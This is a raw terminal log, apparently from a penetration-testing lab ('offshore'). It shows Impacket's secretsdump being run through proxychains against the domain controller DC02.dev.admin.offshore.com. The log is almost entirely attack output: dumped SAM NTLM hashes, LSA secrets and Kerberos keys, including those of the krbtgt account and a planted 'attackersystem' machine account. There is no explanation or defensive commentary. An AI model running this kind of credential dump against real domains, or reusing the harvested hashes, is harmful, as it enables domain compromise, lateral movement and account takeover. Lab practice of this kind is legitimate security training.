┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples] └─$ proxychains -f /home/jay/Documents/offshore/DC02/proxychains4.conf python secretsdump.py dev.admin.offshore.com/Administrator@DC02.dev.admin.offshore.com -no-pass -k
[proxychains] config file found: /home/jay/Documents/offshore/DC02/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra

[proxychains] Strict chain … 127.0.0.1:5000 … DC02.dev.admin.offshore.com:445 … OK [] Service RemoteRegistry is in stopped state [] Starting service RemoteRegistry [] Target system bootKey: 0x50f374409c9699fe7dd5fe709ac21830 [] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [] Dumping cached domain logon information (domain/username:hash) [] Dumping LSA Secrets [] :plain_password_hex:609bb0888bd5afc0861147c55285d5796c2a0c56549242fc6af60443656319db10ad06b9a1f7ab13b44a65274112e1ddd746a4c1841259b943c1b836a4a0c3d48ab72ae464c0833433bf6275ea4bc6ba5028b32ad9010429990e7c56b38344e20034001c10b998695a547dc8b2e616309989e333e2c7db3e2c422e30f54c9caa3a3316ee3b86b9c12fe430e28855c889c1290e335dce4675558e8694b4536cec2b3edb46f45d9a54e06291abbc1d7c0ea9e845bdf4a59642f576fe72af2c695215ce2c482a14df702883047835ad1dc820ec423fbf46f1e51acba88d727acb87c5d395c4ff63ca3308d74a101bc9021f DEV\DC02KM 0000 3D 3D E8 3C D1 46 2B 26 15 28 5F D7 F6 60 C4 2C ==.<.F+&.(_..`., 0010 FC 31 A1 08 82 BD 8F 1B C8 59 44 5C 20 DC AC 54 .1…YD\ ..T 0020 54 DE 73 3A 14 1A 39 D3 9D 19 3D 83 1C E6 41 3D T.s:..9…=…A= 0030 2E B9 01 9F 68 75 53 A3 C5 75 B4 AC 54 8E 85 3A …huS..u..T..: NL:1000:aad3b435b51404eeaad3b435b51404ee:dca81e6f8e5ed2c63a8bd991d0fadfd8::: WS03:11101:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f::: ADMIN:1109:aad3b435b51404eeaad3b435b51404ee:5953a463d9da39f919e43d423a338534::: [] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:acac0da333c53ea3ba7e52ad989681d999738cfeea20c66a0e893939ddc477de Administrator:aes128-cts-hmac-sha1-96:8178a5d200fc12ebffbea1342c92b4b0 Administrator:des-cbc-md5:13d0b99e80e620b0 krbtgt:aes256-cts-hmac-sha1-96:ff860b4fd2c2f5564510b6859a5a48bfe946f8bec8b09513ad34143e30a11fd7 krbtgt:aes128-cts-hmac-sha1-96:09788e9595e400892b1b0adbb3fb998b krbtgt:des-cbc-md5:b3468c028fa8f434 IIS_dev:aes256-cts-hmac-sha1-96:722a36b24dfbfad20cbff913305f50d536cb5d617888f58171266465985efb37 IIS_dev:aes128-cts-hmac-sha1-96:d3f73a9874b8c75bce567b572829a57d IIS_dev:des-cbc-md5:61c8cb0e49d35880 DC02:aes128-cts-hmac-sha1-96:e2f8737c7f5a0688d191329b8fb72696 DC02:aes256-cts-hmac-sha1-96:56c8faa6419b632e07dc8b40dfa29b4810728633389a5a84835abce4fb76a72b WS03:des-cbc-md5:5786c845ef86c268 attackersystem:aes128-cts-hmac-sha1-96:7006f50cd20869d05210c3238a6457cb attackersystem:aes256-cts-hmac-sha1-96:0605f80e0f957049e003d63277d56db48610c4ff3275e4a0e85c7c8a05464e5c ADMIN:des-cbc-md5:310bfd6ed589049e CORP:aes128-cts-hmac-sha1-96:32de2889b5489b3ad8dc867807933a29 CORP$:des-cbc-md5:16d0083483e9d05b